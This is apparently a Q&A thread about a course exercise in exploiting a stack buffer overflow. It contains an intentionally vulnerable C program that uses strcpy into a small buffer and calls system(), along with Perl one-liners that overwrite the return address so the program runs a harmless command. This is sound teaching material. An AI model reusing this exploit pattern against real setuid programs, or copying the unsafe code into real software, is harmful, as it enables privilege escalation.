# Exploiting a Stack Buffer Overflow

Tags: c, linux, bash, buffer-overflow

I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:

```sh
$ ./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"' | touch test.txt)
```

We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.

From what I gather, the issue is either syntax or quotation marks.

How could I correct the one liner?

Source for Script

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

char arg1[60];
char arg2[60];

void func(char *s){
    char buf[32];
    strcpy(buf, s);
    
    printf("you entered: %s\n", buf);
}

void secret(){
  system(arg2);
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s some_string\n", argv[0]);
        return 2;
    }
    strcpy(arg1, argv[1]);

    if (argc == 3) {
      strcpy(arg2, argv[2]);
    }
      
    func(argv[1]);
    return 0;
}
```

Comment: Why would they execute as root?

Comment: What does the `| touch test.txt)` part suppose to do? You are piping the output of the perl command (the print!) into the touch command.

Comment: @Marco all it is meant to do is to create a txt file as root, instead of the standard user. The script is essentially two arguments, arg1 is the perl script to fill the buffer and provide the return address, arg 2 should allow access to a system () function, where the creation of the test.txt file should take place.

Comment: Ok, but where it the buffer overflow that you want to exploit? Is it in script or in the arg2 program? Your invocation of the script right now is taking just one argument.

Comment: I am assuming you want to exploit a buffer overflow in script based on the first parameter, and that would cause it to call  `system()` with the second parameter

Comment: @Marco It's in the script that contains both arg1 and arg2, where arg2 calls system(). How could I add in another argument? Thanks for your help so far! And yes, exactly that.

Comment: In any case, if you could provide more information about the script that would be helpful (if you have the source code, that would be best!)

Comment: @Marco I've added the source to the main section :)

Comment: @EugeneSh. the file should be created as if the root user had done it, it's meant to be a simplified version of priv escalation.

Comment: How are you compiling your script?

Answer (score 2, accepted):

I think you the part that says `| touch test.txt)` is not needed.

```sh
./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') "touch test.txt"
```

should work.

I am not sure why you are piping the output of the shell script to the `touch` command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).

As in terms of why it's being executed as normal user, in your scenario, your shell was running `touch` as a normal user. What I think you want to do is run your script as root (either by making it a [setuid binary](https://en.wikipedia.org/wiki/Setuid) or just running the program with `sudo`, and make the script actually perform the call to `system("touch ...");`.

Comment: Yes that works to fill the buffer and set the frame pointer to the correct address, but I also need to create a text file using the system() function for arg 2, which is the second part for | touch test.txt.

Comment: But you don't need to use the pipe, you can just separate parameters with spaces. See the updated code

Comment: Thanks for updating the answer, I've tried that, got a segmentation fault and the file wasn't created.
I've also tried ```./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') `touch test.txt` ``` which gave the same result.

Comment: The segmentation fault is nice. It means that your script got executed, and you crashed the buffer overflow. Maybe you can attach gdb to the script and follow along to see what is messing up the call.

Comment: In this scenario, your goal is to overwrite the return address that is stored in the stack with the address of the function that you want to execute (`system`).

It's important to understand here how the program is compiled (or maybe just having access to the assembly) to get a better understanding of where you are going wrong.

Comment: Thanks, the address is correct and I've analysed the gdb assembly. I'm not able to run the command as root, as that would defeat the point of the simulated attack. 
Thanks for your help!

Comment: That doesn't defeat the point of the simulated attack. The idea is that script runs as root, and you get it to run the touch command. However, you should be able to first make sure it runs the command (no need for root) and then either set the script as setuid or run it as root.

Answer (score 0):

After some tinkering, and a bunch of help from the community, the resolution was to use:

`` ./step4 `perl -e 'print "A" x 36 . "\x94\x84\x04\x08"'` "touch test.txt" ``

I checked the assembly in gdb, called the **correct** address for the secret function and by swapping the $() for back ticks, the attack executed as expected. Big thanks to Marco for the help on this one.